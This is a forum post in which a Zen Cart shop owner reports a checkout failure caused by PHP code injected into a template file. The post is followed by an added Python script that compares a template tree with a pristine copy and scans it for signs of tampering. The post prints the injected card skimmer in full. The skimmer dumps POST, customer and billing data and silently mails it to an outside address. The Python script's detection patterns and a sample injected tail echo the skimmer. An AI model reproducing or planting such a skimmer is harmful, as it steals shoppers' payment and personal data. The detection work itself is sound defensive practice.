Hi, today I got notified by a customer that he cannot go past the second step of the checkout.
I immediately tried to replicate the problem with a test user account and I encountered the same problem: a blank page instead of the 3rd step. No error message, nothing.
I started to browse the forum and do searches on Google and I encountered the debug tool listed in many threads by Dr. Byte (sorry if I spelled your name wrong, dude).
I followed the steps and I received this error in the log:
[19-Dec-2010 08:27:21] PHP Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/xxxxxxx/public_html/includes/templates/cherry_zen/templates/tpl_checkout_confirmation_default.php on line 212
I opened tpl_checkout_confirmation_default.php and noticed something weird at the end of the page: a small script with an email address that I had never seen before. What struck me was "what exactly is this doing here?", as it seemed pretty unnatural for an email address to be in the checkout code.
I then opened the default cherry zen template to compare the two files and, as you would guess, the script with the email was an extra.
I uploaded the default tpl_checkout_confirmation_default.php file that came with the cherry zen template and everything went back to normal.
I also did the security update in the config for the inoculation or something against hackers.
My real question is: could other files be compromised? If anyone has encountered this before, I would like to know what other files might have these "extra" scripts.
Here is the extra that was in the checkout confirmation PHP file:
Code:
<?php
$msgz = "";
if (!isset($_SERVER)) { $_SERVER = &$HTTP_SERVER_VARS; }
$msgz .= "========================================================\r\n";
foreach ($_POST as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->customer as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->billing as $key => $value) { $msgz .= $key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
foreach ($order->billing['country'] as $key => $value) { $msgz .= "country-".$key." => ".$value."\r\n"; }
$msgz .= "========================================================\r\n";
$msgz .= $_SERVER['HTTP_REFERER']."\r\n".$_SERVER['SCRIPT_FILENAME']"\r\n";
$msgz .= "\r\n========================================================\r\n";
if(preg_match('/[0-9]{12,19}|paypal/i',$msgz)) {
@mail('cnewberry497######################','setoran',$msgz);
} else {
@mail('cnewberry497######################','setoran',$msgz);
}
?>
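The poster found the injection by comparing one file against the pristine template by hand. The following is an added example, not code from the forum post or from Zen Cart, that does the same comparison for a whole template tree and additionally scans every PHP file for the indicators visible in the injected snippet (an error-suppressed mail() call, a loop dumping $_POST into a string, and a 12-19 digit regex used to spot card numbers). It answers the "could other files be compromised?" question in a repeatable way: files that differ from the pristine copy, files that exist only in the live tree, and files carrying an indicator are all reported. Directory names and the sample files are constructed in a temporary directory; the pristine tree is assumed to be an unpacked copy of the same template version.

```python
#!/usr/bin/env python3
"""Audit a live Zen Cart template tree against a pristine copy.

Added example (not from the forum post or the Zen Cart project). Two checks:
 1. hash comparison against a known-good copy of the same template version,
    which is what the poster did by hand for one file;
 2. a content scan for the indicators seen in the injected snippet, so that
    files with no pristine counterpart (dropped-in files) are still flagged.
All paths below are hypothetical; the sample tree is constructed on the fly.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Indicator patterns derived from the snippet quoted in the post.
INDICATORS = [
    ("suppressed mail() call", re.compile(r"@mail\s*\(")),
    ("loop dumping $_POST", re.compile(r"foreach\s*\(\s*\$_POST\b")),
    # matches e.g. [0-9]{12,19} or \d{13,19}
    ("12-19 digit (card number) regex", re.compile(r"(\[0-9\]|\\d)\{1[0-9],[0-9]{2}\}")),
]


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def scan_indicators(path: Path) -> list:
    """Return the names of indicator patterns present in one file."""
    text = path.read_text(errors="replace")
    return [name for name, rx in INDICATORS if rx.search(text)]


def audit(pristine: Path, live: Path, suffixes=(".php",)) -> dict:
    """Compare the live tree to the pristine tree.

    Returns {relative_path: {"status": ..., "indicators": [...]}} where status
    is one of 'modified', 'added', 'missing'. Unchanged files are only listed
    when the content scan finds an indicator in them.
    """
    def files(root: Path) -> dict:
        return {p.relative_to(root).as_posix(): p
                for p in root.rglob("*") if p.is_file() and p.suffix in suffixes}

    pfiles, lfiles = files(pristine), files(live)
    report = {}
    for rel in sorted(set(pfiles) | set(lfiles)):
        if rel not in lfiles:
            report[rel] = {"status": "missing", "indicators": []}
            continue
        if rel not in pfiles:
            status = "added"
        elif sha256_of(pfiles[rel]) != sha256_of(lfiles[rel]):
            status = "modified"
        else:
            status = "unchanged"
        hits = scan_indicators(lfiles[rel])
        if status != "unchanged" or hits:
            report[rel] = {"status": status, "indicators": hits}
    return report


# Constructed sample content: a stand-in for the clean template file and a
# minimal tail that carries the same three indicators as the quoted snippet.
CLEAN_CONFIRMATION = "<?php\n// constructed stand-in for the checkout confirmation template\necho 'confirm';\n?>\n"
INJECTED_TAIL = (
    "<?php\n$m = '';\nforeach ($_POST as $k => $v) { $m .= $k.'='.$v; }\n"
    "if (preg_match('/[0-9]{12,19}/', $m)) { @mail('REDACTED@example.invalid', 's', $m); }\n?>\n"
)


def build_demo() -> dict:
    """Construct a pristine and a live tree in a temp dir and audit them."""
    root = Path(tempfile.mkdtemp(prefix="zc_audit_"))
    pristine = root / "pristine" / "templates" / "cherry_zen" / "templates"
    live = root / "live" / "templates" / "cherry_zen" / "templates"
    for d in (pristine, live):
        d.mkdir(parents=True)
        (d / "tpl_checkout_confirmation_default.php").write_text(CLEAN_CONFIRMATION)
        (d / "tpl_header.php").write_text("<?php echo 'header'; ?>\n")
    # Live copy: one template tampered with, one stray file dropped in.
    (live / "tpl_checkout_confirmation_default.php").write_text(CLEAN_CONFIRMATION + INJECTED_TAIL)
    (live / "dropped.php").write_text("<?php @mail('REDACTED@example.invalid', 'x', ''); ?>\n")
    return audit(root / "pristine", root / "live")


if __name__ == "__main__":
    for rel, info in build_demo().items():
        print(f"{info['status']:9s} {rel}  {', '.join(info['indicators']) or '-'}")
```

Run against a real install with `audit(Path('/path/to/unpacked/cherry_zen'), Path('/home/account/public_html/includes/templates/cherry_zen'))`; the hash comparison is the authoritative check, and the indicator scan is only a cheap way to prioritise files (including core includes outside the template directory) that have no pristine copy at hand.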